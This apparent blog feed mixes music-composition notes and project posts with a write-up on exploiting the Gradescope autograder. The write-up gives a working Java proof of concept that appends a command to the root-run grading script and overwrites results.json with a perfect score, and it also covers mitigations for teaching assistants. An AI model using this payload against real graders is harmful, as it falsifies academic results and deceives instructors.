<iframe width="560" height="370" src="https://www.youtube-nocookie.com/embed/W4_LWxrSHR4" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe>

<p>I think current instruments lack certain kinds of feedback to performers and especially to audiences. Live performances normally have an auxiliary visual element (like laser lights synced to the music, or generative visuals), which is more of an effect than a cause. Even in Launchpad performances, most of the time the visuals on the grid are nothing more than flashes of light. It would be interesting, then, to play an instrument by playing a game, or to play the game by performing on the instrument, so that each interaction by the performer not only creates sounds/music but also, at the same time, creates a visualization of the music (which is meaningful gameplay in itself). This should further blur the line between sound and visuals, and hopefully create unique interactive feedback.</p>

<h1 id="musc-77">MUSC 77</h1>

<iframe style="border: 0; width: 100%; height: 307px;" src="https://bandcamp.com/EmbeddedPlayer/album=2774807423/size=large/bgcol=ffffff/linkcol=7137dc/artwork=none/transparent=true/" seamless=""><a href="https://superfashi.bandcamp.com/album/intro-to-electronic-music">Intro to Electronic Music by SuperFashi</a></iframe>

<p>All music was produced on a MacBook Pro with Logic Pro stock plugins and instruments.</p>

<p>Recorded, written, composed, programmed, mixed, and mastered by me.</p>

<h2 id="elevator-music">Elevator Music</h2>

<p>The entire track was made from a field recording of an elevator in Harrison College House. The elevator runs through 26 floors (24 floors plus the bottom level and the penthouse), which naturally gave the track a 1+4x6+1 structure. I used the first buzz as a lead-in, the next 4x6 buzzes as 6 different sections of 4 buzzes (bars) each, and the last buzz as the final climax.</p>

<p>All sounds were derived from the original recording by routing the raw recording to different buses with different effects. No synthesizers, sampling, or flex-pitch were involved.</p>

<h2 id="tech-no">Tech, no?</h2>

<p>The track follows the idea of a 2/4 - 3/4 - 4/4 meter change. The 2/4 meter doesn’t exist in the composition as such, but exists as a 2-against-3 polyrhythm over the 3/4 meter. I hand-tuned some of the cymbal notes to accent downbeats and upbeats, but instead of placing them on the meter’s actual downbeats and upbeats, I put the accents in different places to produce a polymetric feel.</p>

<p>Drum Synth was the only instrument used in this track. Automation was used heavily to adjust the parameters of the different Drum Synths to simulate realistic drumming.</p>
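<p>One way to picture a 2-against-3 polyrhythm is to divide a bar into lcm(2, 3) = 6 equal slots: the three-beat layer lands on every second slot, the two-beat layer on every third, and the two coincide only on the downbeat. A tiny Java sketch that prints that grid (the class and method names are just for illustration):</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code>public class Polyrhythm {
    static int gcd(int a, int b) {
        return b == 0 ? a : gcd(b, a % b);
    }

    // One bar split into "pulses" equal slots; "x" marks an onset, "." a rest.
    // Assumes pulses is a multiple of beats.
    static String track(int beats, int pulses) {
        return ("x" + ".".repeat(pulses / beats - 1)).repeat(beats);
    }

    public static void main(String[] args) {
        int pulses = 2 * 3 / gcd(2, 3);                 // lcm(2, 3) = 6 slots per bar
        System.out.println("3: " + track(3, pulses));   // 3: x.x.x.  (the 3/4 pulse)
        System.out.println("2: " + track(2, pulses));   // 2: x..x..  (the implied 2/4 layer)
    }
}
</code></pre></div></div>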

<h2 id="none-shall-sleep">None Shall Sleep</h2>

<p>The track uses samples from a version of “Nessun dorma” performed by Luciano Pavarotti. I chose to sample opera to break away from the usual habit of sampling 70s/80s songs. Only the drums and the electronic piano are not from the sample.</p>

<p>The sample was loaded into Q-sampler and the sample points were hand-chosen. The “fake-out intro” plays the sample at 2X speed, while the actual track plays it at 4X speed. The entire sample is pitch-shifted 10 semitones up.</p>

<h2 id="dark-woods">Dark Woods</h2>

<p>Seven Retro Synths and one Alchemy were used for this track. Synths with different textures were introduced one by one to draw the listener’s focus to each new timbre. Automation was used for mixing, while multiple Randomizers and Modulators were used for the synth parameters.</p>

<p>This work uses A=432Hz with a 17-TET Pythagorean tuning system, inspired, of course, by Wendy Carlos.</p>
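<p>Assuming “17-TET” here means 17 equal divisions of the octave (a Pythagorean 17-note scale would instead be built by stacking pure 3:2 fifths, and the exact construction isn’t spelled out above), each step is a frequency ratio of 2<sup>1/17</sup>, so the note n steps from A is 432 · 2<sup>n/17</sup> Hz. A small Java sketch of that formula:</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code>public class SeventeenTet {
    static final double A4 = 432.0;          // reference pitch from the text
    static final int STEPS_PER_OCTAVE = 17;  // assumed equal division of the octave

    // Frequency (Hz) of the note "steps" equal steps above A (negative = below).
    static double freq(int steps) {
        return A4 * Math.pow(2.0, steps / (double) STEPS_PER_OCTAVE);
    }

    // Size of an interval of "steps" equal steps, in cents (1200 cents per octave).
    static double cents(int steps) {
        return 1200.0 * steps / STEPS_PER_OCTAVE;
    }

    public static void main(String[] args) {
        System.out.println(freq(0));   // 432.0
        System.out.println(freq(17));  // 864.0, one octave up
        // Closest 17-TET step to a pure 3:2 fifth:
        System.out.println(freq(10) + " Hz, " + cents(10) + " cents");
    }
}
</code></pre></div></div>

<p>Ten steps (about 705.9 cents) is the closest 17-TET approximation of a pure fifth (about 702.0 cents).</p>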

<h2 id="dance">Dance</h2>

<p>Heavily inspired by Yasutaka Nakata’s work, I wanted to make a piece in his signature dance-pop style. I chose the classic verse-chorus ABA’BCB form, with an intro and a pre-chorus in mind, which he uses a lot in his productions for KPP.</p>

<p>Also following his lead, I made the transitions between sections seamless. Subtle hints in harmony, melody, and percussion pace the song and push the energy into the next section.</p>

<h1 id="musc-70">MUSC 70</h1>

<h2 id="for-bg">For B.G.</h2>

<p>This is the second composition assignment for the course. We were asked to use simple triads in our piece and to label them with Roman numerals and a bass note. I also added a staccato flavor and a key change in the middle to make the piece sound a bit more unique. The opening interval was borrowed from <em>Cambridge, 1963</em> by Jóhann Jóhannsson, which I think has a very bright feeling.</p>

<p>The piece was named <em>For B.G.</em> simply because I asked her what a good name would be and she said “why not have it for me.” (or something like that)</p>

<h3 id="musescore"><a href="https://musescore.com/user/2376136/scores/6506108/s/shDAdb">MuseScore</a></h3>

<iframe width="100%" height="394" src="https://musescore.com/user/2376136/scores/6506108/s/E7s3lf/embed" frameborder="0" allowfullscreen="" allow="autoplay; fullscreen"></iframe>

<h3 id="soundcloud"><a href="https://soundcloud.com/user-906245806/hanbang-wang">SoundCloud</a></h3>

<p>Performed by Erin Busch.</p>

<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/934155934&amp;color=%23ff5500&amp;auto_play=false&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true"></iframe>
<div style="font-size: 10px; color: #cccccc;line-break: anywhere;word-break: normal;overflow: hidden;white-space: nowrap;text-overflow: ellipsis; font-family: Interstate,Lucida Grande,Lucida Sans Unicode,Lucida Sans,Garuda,Verdana,Tahoma,sans-serif;font-weight: 100;"><a href="https://soundcloud.com/user-906245806" title="Music 70" target="_blank" style="color: #cccccc; text-decoration: none;">Music 70</a> · <a href="https://soundcloud.com/user-906245806/hanbang-wang" title="Hanbang Wang" target="_blank" style="color: #cccccc; text-decoration: none;">Hanbang Wang - For B.G.</a></div>

<h2 id="over-the-rainbow">Over the Rainbow</h2>

<p>This is the third and final composition assignment for the course. We were asked to use seventh chords in this piece and write it in lead-sheet style. I wrote it in AABA form like a pop song, but so slow that it’s like a lullaby lol. The piece is named <em>Over the Rainbow</em> because I wrote a lot of almost-octave jumps, which just reminded me of that song.</p>

<h3 id="musescore-1"><a href="https://musescore.com/user/2376136/scores/6506112/s/widVlU">MuseScore</a></h3>

<iframe width="100%" height="394" src="https://musescore.com/user/2376136/scores/6506112/s/3UOr-p/embed" frameborder="0" allowfullscreen="" allow="autoplay; fullscreen"></iframe>

<h3 id="soundcloud-1"><a href="https://soundcloud.com/user-906245806/hanbang-wang-over-the-rainbow?in=user-906245806/sets/music-70-fall-2020-composition-3">SoundCloud</a></h3>

<p>Performed by Erin Busch.</p>

<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/948189691&amp;color=%23ff5500&amp;auto_play=false&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true"></iframe>
<div style="font-size: 10px; color: #cccccc;line-break: anywhere;word-break: normal;overflow: hidden;white-space: nowrap;text-overflow: ellipsis; font-family: Interstate,Lucida Grande,Lucida Sans Unicode,Lucida Sans,Garuda,Verdana,Tahoma,sans-serif;font-weight: 100;"><a href="https://soundcloud.com/user-906245806" title="Music 70" target="_blank" style="color: #cccccc; text-decoration: none;">Music 70</a> · <a href="https://soundcloud.com/user-906245806/hanbang-wang-over-the-rainbow" title="Hanbang Wang - Over the Rainbow" target="_blank" style="color: #cccccc; text-decoration: none;">Hanbang Wang - Over the Rainbow</a></div>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Music" /><category term="Composition" /><summary type="html"><![CDATA[Here are some of my compositions in music.]]></summary></entry><entry><title type="html">Hacking Gradescope Autograder</title><link href="http://0.0.0.0/blog/hack-gs/" rel="alternate" type="text/html" title="Hacking Gradescope Autograder" /><published>2019-12-27T10:00:00-05:00</published><updated>2019-12-27T10:00:00-05:00</updated><id>http://0.0.0.0/blog/hack-gs</id><content type="html" xml:base="http://0.0.0.0/blog/hack-gs/"><![CDATA[<p>So yeah, every script-kiddie has this little dream of hacking his own school to get a perfect score. 
<!--more--></p>

<p><img src="/assets/images/gs-hack/screenshot.jpg" alt="Autograder HACKED" /></p>

<h1 id="prologue">Prologue</h1>

<p><a href="https://www.gradescope.com/">Gradescope</a> is an online grading platform for schools, founded by an instructor at UC Berkeley. Some of its security issues were exposed long ago by a group of MIT students as their final course project<sup><a href="https://courses.csail.mit.edu/6.857/2016/files/20.pdf">[1]</a></sup>.</p>

<p>I, on the other hand, just wanna realize my dream of hacking my score when things hit me hard.</p>

<p>The MIT guys had already done a lot, including showing that we can directly <strong>read the source code of the autograder and upload it to a remote server</strong> (details in the paper, section 5.3.2, or down below). However, they did not achieve the final step, which obviously is changing one’s score at will.</p>

<h2 id="disclaimer">Disclaimer</h2>

<p>Now before you continue:</p>

<p>The following content and all associated programming code (“this work”) are written and developed solely for educational and research purposes. Using this work in an uncontrolled production environment, without the permission of the owner of the autograder, may break Gradescope’s Terms of Use, and may potentially violate your affiliation’s Code of Conduct. Under no circumstances shall I be liable for any misuse of this work.</p>

<h2 id="details">Details</h2>

<p>First a little recap. The following is a rough flowchart of how a general Gradescope autograder works:</p>

<p><img src="/assets/images/gs-hack/flowchart.svg" alt="Autograder Flowchart" /></p>

<p>The line in red indicates where our code starts running. Anything before this point is out of our control without administrative privileges (being an instructor or having control over Gradescope’s servers).</p>

<p>It seems that we have ruled out many potential options. However, because of how Gradescope’s autograder is set up, <code class="language-plaintext highlighter-rouge">run_autograder</code> is executed as root. This means that anything run as a child process of <code class="language-plaintext highlighter-rouge">run_autograder</code> runs as root too.</p>

<p>Our submitted code therefore runs with root privileges, and this opens up a whole new door towards arbitrary code execution.</p>

<h1 id="exploitation">Exploitation</h1>

<p>With the power of root, we can traverse all the files on the server (more precisely, inside the Docker container, short of a sandbox escape exploit) and, since we also have Internet access, upload them to a remote server we control.</p>

<p>Normies would stop here and say, “Well, we have the test cases, so just study them and debug your code.” <strong>ⒻⒶⒸⓉ</strong>, but not enough. As a TA myself, I tend to write large random fuzzing tests that generate stuff no one understands. Therefore, we need the power to change the scores directly.</p>

<h2 id="direct-output">Direct Output</h2>

<p>The first thing that comes to mind is to write directly to the output file <code class="language-plaintext highlighter-rouge">results.json</code>. Its path is fixed (<code class="language-plaintext highlighter-rouge">/autograder/results/results.json</code>), and we know the output format from the <a href="https://gradescope-autograders.readthedocs.io/en/latest/specs/#output-format">documentation</a>. It seems all we need to do is write to the file, and that’s it.</p>

<p>However, take a look at the flowchart and you will see that <code class="language-plaintext highlighter-rouge">results.json</code> is written by <code class="language-plaintext highlighter-rouge">run_autograder</code> <strong>after</strong> the tests finish. This means whatever we write to the file gets overwritten by the real autograder results.</p>

<p>This <em>seems</em> to have an easy fix: after our code writes to the file, just make the file immutable so that the real autograder cannot overwrite it. The problem is that Docker by default runs containers without the <code class="language-plaintext highlighter-rouge">LINUX_IMMUTABLE</code> capability, so the immutable attribute (<code class="language-plaintext highlighter-rouge">chattr +i</code>) cannot be set; and making the file unwritable with <code class="language-plaintext highlighter-rouge">chmod</code> does not help either, since root bypasses ordinary permission bits, so the file can still be overwritten.</p>

<p>This is a no-go.</p>

<h2 id="direct-submission">Direct Submission</h2>

<p>Following the path on the flowchart, the next thing that caught my eye was the step where <code class="language-plaintext highlighter-rouge">harness.py</code> uploads the result via an HTTP POST request. If Gradescope accepts and parses only the first result that comes in, it might ignore any subsequent request.</p>

<p>So the idea is to send our own HTTP request to the URL for submitting the result. Looking into the source code of <code class="language-plaintext highlighter-rouge">harness.py</code>, it turns out the URL is read from an environment variable. Everything seemed to be going well: the user code could successfully get the URL from the environment, but the HTTP request simply did not come back OK.</p>

<p>A deeper look into the source code showed that the request needs an authentication token in its header. Although the token is also read from an environment variable, the Gradescope developers actually paid attention to this little detail and delete the variable after loading it. As a result, no child process of <code class="language-plaintext highlighter-rouge">harness.py</code> can see that variable.</p>
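<p>The protection described here is ordinary secret hygiene: a variable removed from a process’s environment is not inherited by the children it spawns afterwards. Java cannot modify its own environment at runtime (<code class="language-plaintext highlighter-rouge">System.getenv()</code> is read-only), so the closest Java analogue is to drop the secret from the <code class="language-plaintext highlighter-rouge">ProcessBuilder</code>’s copy of the environment before launching the child. A small sketch, with a hypothetical variable name and assuming a POSIX <code class="language-plaintext highlighter-rouge">sh</code> is available:</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import java.io.IOException;

public class ScrubbedChildEnv {
    // Hypothetical variable name; not the harness's real one.
    static final String SECRET = "HYPOTHETICAL_SUBMIT_TOKEN";

    // Spawn a child shell and return what it sees for SECRET ("unset" if absent).
    static String childSees(boolean scrub) throws IOException, InterruptedException {
        ProcessBuilder pb = new ProcessBuilder(
                "sh", "-c", "printf %s \"${" + SECRET + ":-unset}\"");
        pb.environment().put(SECRET, "s3cr3t");  // simulate the token being in our environment
        if (scrub) {
            pb.environment().remove(SECRET);     // the child never receives it
        }
        Process p = pb.start();
        String out = new String(p.getInputStream().readAllBytes());
        p.waitFor();
        return out;
    }

    public static void main(String[] args) throws Exception {
        System.out.println(childSees(false)); // s3cr3t
        System.out.println(childSees(true));  // unset
    }
}
</code></pre></div></div>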

<p>What a pity.</p>

<h4 id="thoughts">thoughts…</h4>

<p>While writing this, it occurred to me that we could spin up a fake web server to MITM the submission. We could add a hosts entry pointing the URL’s host to a loopback address, make <code class="language-plaintext highlighter-rouge">harness.py</code> hit our fake server, change the payload, and forward it to the real remote server.</p>

<p>One detail to take care of is that the URL uses HTTPS, meaning we would have to generate a self-signed certificate and trust it locally. I’m not quite sure how Python’s HTTP library handles this, i.e. whether it loads the certificate in time or caches it. Nonetheless, this could potentially work.</p>

<p>Also, there could be other methods to extract the authentication token, such as dumping the memory of the running <code class="language-plaintext highlighter-rouge">harness.py</code> script and searching it. But that could be way too hardcore for our script-kiddie oriented write-up here.</p>

<h2 id="bottleneck">Bottleneck</h2>

<p>We need to make sure <code class="language-plaintext highlighter-rouge">results.json</code> is changed after the real results are written, but before it is read and uploaded by <code class="language-plaintext highlighter-rouge">harness.py</code>. Looking at the flowchart, this does not leave us much room. It also seems like an impossible job: <code class="language-plaintext highlighter-rouge">results.json</code> is written after our code finishes executing, so how could we do anything if our code is no longer running?</p>

<p>Naturally, we need some kind of delayed trigger that still works after our code exits. I tried <code class="language-plaintext highlighter-rouge">cron</code> and <code class="language-plaintext highlighter-rouge">sleep</code>, but both are polling-based and need precise timing, and neither seemed to work well in this scenario (maybe just bad luck on my part).</p>

<h4 id="thoughts-1">thoughts…</h4>

<p>While writing this, it occurred to me that we could use <code class="language-plaintext highlighter-rouge">inotify</code>-related utilities to watch the <code class="language-plaintext highlighter-rouge">results.json</code> file for changes, which turns the scenario into an event-driven one instead of polling. If fast enough, we might squeeze the change in between <code class="language-plaintext highlighter-rouge">run_autograder</code> writing the file and <code class="language-plaintext highlighter-rouge">harness.py</code> reading it.</p>

<h2 id="a-new-light">A New Light</h2>

<p>All hope seems lost, although you might have already noticed the larger arrow in the flowchart. It comes after the autograder result is written to <code class="language-plaintext highlighter-rouge">results.json</code>, but before <code class="language-plaintext highlighter-rouge">run_autograder</code> exits. It would be perfect if we could do something at this point, but how?</p>

<p>I couldn’t help but wonder: can we make <code class="language-plaintext highlighter-rouge">run_autograder</code> do what we want? At first glance, this seems implausible, as <code class="language-plaintext highlighter-rouge">run_autograder</code> is written by the instructors and is already in place before our code starts running. This holds for almost all executables, since it is impossible to change the instructions of a running program (short of some hardcore injection, that is). This is also why we can’t just modify <code class="language-plaintext highlighter-rouge">harness.py</code> to make it do what we want.</p>

<p>But <code class="language-plaintext highlighter-rouge">run_autograder</code> is an exception. Although the documentation says that <code class="language-plaintext highlighter-rouge">run_autograder</code> can be any type of executable file, the examples provided by Gradescope are shell scripts, so many autograders follow suit.</p>

<p>What’s wrong with shell scripts? Well, the shell reads and executes a script incrementally, line by line, which means that if we <strong>append new lines to the script before it finishes, the new lines get executed</strong>. Since <code class="language-plaintext highlighter-rouge">run_autograder</code> also has a fixed path, this makes our life <em>tremendously easier</em>. All that’s left is to append the commands we want it to execute to the end of the file, and that’s it.</p>

<h2 id="the-final-payload">The Final Payload</h2>

<p>I decided to write a Python script to <code class="language-plaintext highlighter-rouge">/autograder/exploit.py</code>, and then append a single line, <code class="language-plaintext highlighter-rouge">python /autograder/exploit.py</code>, to the end of <code class="language-plaintext highlighter-rouge">run_autograder</code>. The following is the POC code I used for a Java autograder. I also tried it with a Python autograder, which works fine as well. Other autograders should theoretically work too, as long as they use a shell script as the <code class="language-plaintext highlighter-rouge">run_autograder</code> file.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">java.io.IOException</span><span class="o">;</span>
<span class="kn">import</span> <span class="nn">java.nio.file.Files</span><span class="o">;</span>
<span class="kn">import</span> <span class="nn">java.nio.file.Path</span><span class="o">;</span>
<span class="kn">import</span> <span class="nn">java.nio.file.Paths</span><span class="o">;</span>
<span class="kn">import</span> <span class="nn">java.nio.file.StandardOpenOption</span><span class="o">;</span>

<span class="kd">public</span> <span class="kd">class</span> <span class="nc">Submission</span> <span class="o">{</span>
    <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">question1</span><span class="o">()</span> <span class="o">{</span>
        <span class="kd">final</span> <span class="nc">String</span> <span class="n">exploit</span> <span class="o">=</span> <span class="s">"import json\n"</span> <span class="o">+</span>
                <span class="s">"with open('/autograder/results/results.json', 'w') as f:\n"</span> <span class="o">+</span>
                <span class="s">"    f.write('{\"score\": 100.0}')"</span><span class="o">;</span>
        <span class="kd">final</span> <span class="nc">Path</span> <span class="n">exploitPath</span> <span class="o">=</span> <span class="nc">Paths</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="s">"/autograder/exploit.py"</span><span class="o">);</span>
        <span class="k">if</span> <span class="o">(</span><span class="nc">Files</span><span class="o">.</span><span class="na">notExists</span><span class="o">(</span><span class="n">exploitPath</span><span class="o">))</span> <span class="o">{</span>
            <span class="kd">final</span> <span class="nc">Path</span> <span class="n">agPath</span> <span class="o">=</span> <span class="nc">Paths</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="s">"/autograder/run_autograder"</span><span class="o">);</span>
            <span class="k">try</span> <span class="o">{</span>
                <span class="nc">Files</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="n">agPath</span><span class="o">,</span> <span class="s">"\npython /autograder/exploit.py"</span><span class="o">.</span><span class="na">getBytes</span><span class="o">(),</span>
                        <span class="nc">StandardOpenOption</span><span class="o">.</span><span class="na">APPEND</span><span class="o">);</span>
                <span class="nc">Files</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="n">exploitPath</span><span class="o">,</span> <span class="n">exploit</span><span class="o">.</span><span class="na">getBytes</span><span class="o">(),</span>
                        <span class="nc">StandardOpenOption</span><span class="o">.</span><span class="na">WRITE</span><span class="o">,</span> <span class="nc">StandardOpenOption</span><span class="o">.</span><span class="na">CREATE</span><span class="o">);</span>
            <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">IOException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span>
                <span class="n">e</span><span class="o">.</span><span class="na">printStackTrace</span><span class="o">();</span>
            <span class="o">}</span>
        <span class="o">}</span>
    <span class="o">}</span>
<span class="o">}</span>
</code></pre></div></div>

<p>This is a POC exploit that overwrites the real autograder output and sets the score to 100. It assumes <code class="language-plaintext highlighter-rouge">Submission.question1()</code> will be invoked somewhere during the tests.</p>

<h1 id="prevention">Prevention</h1>

<p>According to the paper by the MIT guys, this problem already existed back in 2016, when the autograder was still in beta. Based on this, I guess the Gradescope developers are not going to fix it anytime soon.</p>

<p>Hence, the responsibility for preventing students from using this exploit to get perfect scores lies on the shoulders of us TAs.</p>

<p>The fix is rather easy:</p>

<ul>
  <li>
    <p>Create a new user account, say <code class="language-plaintext highlighter-rouge">runner</code>, that is <em>not</em> in the sudoers.</p>

    <p>(e.g. <code class="language-plaintext highlighter-rouge">sudo adduser runner --no-create-home --disabled-password --gecos ""</code>)</p>
  </li>
  <li>
<p>Set all the files and folders with sensitive data (<code class="language-plaintext highlighter-rouge">run_autograder</code>, <code class="language-plaintext highlighter-rouge">results/</code>, source code, etc.) to be inaccessible to other users. (e.g. <code class="language-plaintext highlighter-rouge">chmod o= &lt;file&gt;</code>)</p>

    <p>However, make sure that the compiled executables or bytecode files (like <code class="language-plaintext highlighter-rouge">.class</code> for Java and <code class="language-plaintext highlighter-rouge">.pyc</code> for Python), as well as all related files, remain accessible to other users.</p>
  </li>
  <li>
    <p>Then, run the test suites as the user <code class="language-plaintext highlighter-rouge">runner</code>.</p>

    <p>(e.g. prefix the command that runs the tests with <code class="language-plaintext highlighter-rouge">sudo -u runner</code>)</p>
  </li>
</ul>
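<p>To double-check the <code class="language-plaintext highlighter-rouge">chmod</code> step, a setup script could audit the permission bits of the sensitive paths before the tests run. A minimal Java sketch, assuming the default <code class="language-plaintext highlighter-rouge">/autograder</code> layout mentioned above and a POSIX file system; the class and method names are hypothetical:</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.attribute.PosixFilePermissions;

public class PermissionAudit {
    // True if the permission bits grant anything at all to "others",
    // i.e. an unprivileged account such as runner could touch the path.
    static boolean exposedToOthers(Path path) throws IOException {
        String bits = PosixFilePermissions.toString(Files.getPosixFilePermissions(path));
        return !bits.endsWith("---");
    }

    public static void main(String[] args) throws IOException {
        // Paths from the steps above; extend with your own source directories,
        // but leave out the compiled files that runner still needs.
        String[] sensitive = {"/autograder/run_autograder", "/autograder/results"};
        boolean ok = true;
        for (String s : sensitive) {
            Path p = Paths.get(s);
            if (!Files.exists(p)) {
                continue;
            }
            if (exposedToOthers(p)) {
                System.out.println("still accessible by others: " + p);
                ok = false;
            }
        }
        System.out.println(ok ? "permissions look locked down" : "run chmod o= on the paths above");
    }
}
</code></pre></div></div>

<p>This only inspects the “others” bits, which is what <code class="language-plaintext highlighter-rouge">chmod o=</code> changes; if <code class="language-plaintext highlighter-rouge">runner</code> happens to share a group with a file’s owner, the group bits need checking too.</p>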

<p>And this should fix the problem.</p>

<p>This also prevents students from reading the source code. Although they could still upload the compiled files and decompile them, this should make it considerably harder.</p>

<p>If your test suites do not need network access or stdout, you could potentially disable those as well, so that your autograder truly becomes a black box to any student-submitted code.</p>

<h1 id="epilogue">Epilogue</h1>

<p>Honestly, Gradescope lacks a lot of features that we TAs, who use Gradescope for everything from homework to exam grading, consider essential (there isn’t even a mutual-exclusion lock for grading). The situation hasn’t gotten any better since it was acquired by Turnitin.</p>

<p>If someday I’m tired of dealing with it, I’ll write a new online grading platform myself.</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="Network" /><category term="Gradescope" /><category term="Autograder" /><category term="Script" /><summary type="html"><![CDATA[So yeah, every script-kiddie has this little dream of hacking his own school to get a perfect score.]]></summary></entry><entry><title type="html">Penn Automate</title><link href="http://0.0.0.0/blog/penn-automate/" rel="alternate" type="text/html" title="Penn Automate" /><published>2019-04-12T19:00:00-04:00</published><updated>2019-04-12T19:00:00-04:00</updated><id>http://0.0.0.0/blog/penn-automate</id><content type="html" xml:base="http://0.0.0.0/blog/penn-automate/"><![CDATA[<p><img src="/assets/images/pennmate/pennmate.png" alt="Penn Automate" width="200" /></p>

<p>Main Page: <a href="https://pennmate.com">pennmate.com</a><br />
GitHub Page: <a href="https://github.com/penn-automate">Penn Automate</a><br />
LinkedIn Page: <a href="https://www.linkedin.com/company/penn-automate">Penn Automate | LinkedIn</a></p>

<h2 id="introduction">Introduction</h2>

<p>On that special day, I missed the emails from both <a href="http://www.penncoursenotify.com">PennCourseNotify</a> and <a href="https://penncoursealert.com">PennCourseAlert</a> for EAS-203, twice, so I was <em>a bit</em> angry.</p>

<p>That is when the idea of Penn Automate came up. Penn Automate is a series of simple apps that help Penn students automate tasks that are repetitive or hard for humans.</p>

<p>Penn Automate is usually abbreviated to <strong>Pennmate</strong>, which is used as a prefix for all apps affiliated with this project. The project is planned to be fully open-sourced on GitHub.</p>

<p>The website for this project is still under construction at the time of this post, but it is planned for the next few weeks, depending on the feedback on the <a href="#pennmate-notify">first app</a>.</p>

<h2 id="technical-details">Technical Details</h2>

<p>The server is hosted on AWS Lightsail.</p>

<p>The main backend is written in PHP, with Nginx as the web server and MySQL as the database.</p>

<p>Go is used for microservices, snippets, and daemons that assist with the services.</p>

<p>Flutter and Dart are used for writing mobile apps. Other cross-platform frameworks such as React Native are under consideration.</p>

<p>Bootstrap and jQuery are the frameworks currently used for front-end projects.</p>

<h1 id="mobile-apps">Mobile Apps</h1>

<h2 id="pennmate-notify">Pennmate Notify</h2>

<p><img src="/assets/images/pennmate/pennmate-notify.png" alt="Pennmate Notify" width="200" /></p>

<p>GitHub page: <a href="https://github.com/penn-automate/pennmate-notify-app">Pennmate Notify App</a></p>

<p>Notification by email is not stupid; it’s just slow. Emails are not sent concurrently; an email can take much longer to actually arrive in your inbox; masses of emails from the same address can trigger spam filters; and the message might simply not pop up, or can easily get mixed in with your other emails.</p>

<p>Also, there are privacy concerns if you give out your email and the courses you want to be in at the same time. The data could easily be correlated with your individual identity and used to figure out how you planned your schedule. I heard<sup>[<i>citation needed</i>]</sup> that PennLabs is already doing this when you fill in your courses on Penn Mobile.</p>

<p>So forget about all that and embrace <strong>Pennmate Notify</strong>, an app that pushes simplicity and functionality to the max and does nothing other than tell you, at the shortest notice, that a course is open.</p>

<h3 id="download">Download</h3>

<p>Google Play: <a href="https://play.google.com/store/apps/details?id=edu.hanbangw.pennmate_notify">Pennmate Notify - Apps on Google Play</a>.</p>

<p>This app is written in <a href="https://www.dartlang.org/">Dart</a> and uses the <a href="https://flutter.dev/">Flutter</a> framework. It is natively a cross-platform app, meaning that it can run on both iOS and Android devices.</p>

<p>Unfortunately, it is not possible to install an app from an unknown source on a non-jailbroken iOS device. The only way around this is for me to get a developer account from Apple, which costs $99/yr. <small>im cute plz give me money</small></p>

<h1 id="browser-extension">Browser Extension</h1>

<h2 id="pennmate-notify-1">Pennmate Notify</h2>

<p>GitHub page: <a href="https://github.com/penn-automate/pennmate-notify-chrome">Pennmate Notify Chrome</a><br />
Download: <a href="https://chrome.google.com/webstore/detail/pennmate-notify/gmblmifibabhknlefcohofgpnbelleki">Pennmate Notify - Chrome Web Store</a></p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="Network" /><category term="Pennmate" /><summary type="html"><![CDATA[Penn Automate is a personal project started by me one day when not paying attention to NETS class.]]></summary></entry><entry><title type="html">Free Tutoring</title><link href="http://0.0.0.0/blog/free-tutoring/" rel="alternate" type="text/html" title="Free Tutoring" /><published>2019-01-22T18:40:00-05:00</published><updated>2019-01-22T18:40:00-05:00</updated><id>http://0.0.0.0/blog/free-tutoring</id><content type="html" xml:base="http://0.0.0.0/blog/free-tutoring/"><![CDATA[<p>Starting in Fall 2019, I work at <a href="https://www.vpul.upenn.edu/tutoring/" target="_blank">The Tutoring Center</a>, one of three offices within the Weingarten Learning Resources Center, which offers Penn undergraduate students free, accessible, and convenient options to supplement their academic experience. Tutoring is available one-on-one and in groups, by appointment and walk-in.</p>

<hr />

<h1 id="introduction">Introduction</h1>

<p>My free tutoring is now open to anyone at Penn studying computer science or a related field of science and technology. You can ask questions over email, or come to my room at the address and during the times listed below.</p>

<p>I’d love to teach anything related to computer science or answer questions about it, including software and hardware, PC problems and server maintenance, algorithms and debugging, programming languages, and so forth.</p>

<p>Apart from CS, I can also teach Native Mainland Mandarin™, if that’s what you need.</p>

<p>I also like music, games, and Japanese anime. If you are looking for someone to discuss those with, you are very welcome too.</p>

<p>Please email me the time you want to come by at least 30 minutes in advance, and I will reply if I’m free. Walk-ins are also welcome, but you might simply not find me.</p>

<p>Again, this whole tutoring thing is completely free!</p>

<h1 id="address-and-timeslots">Address and Timeslots</h1>

<h2 id="spring-2019">Spring 2019</h2>

<ul>
  <li>Wednesday, 11:00 A.M. - 8:00 P.M.</li>
  <li>Friday/Saturday, 10:00 A.M. - 10:00 P.M.</li>
  <li>Sunday, 10:00 A.M. - 8:00 P.M.</li>
</ul>

<p>Room 310, Van Pelt, Gregory</p>
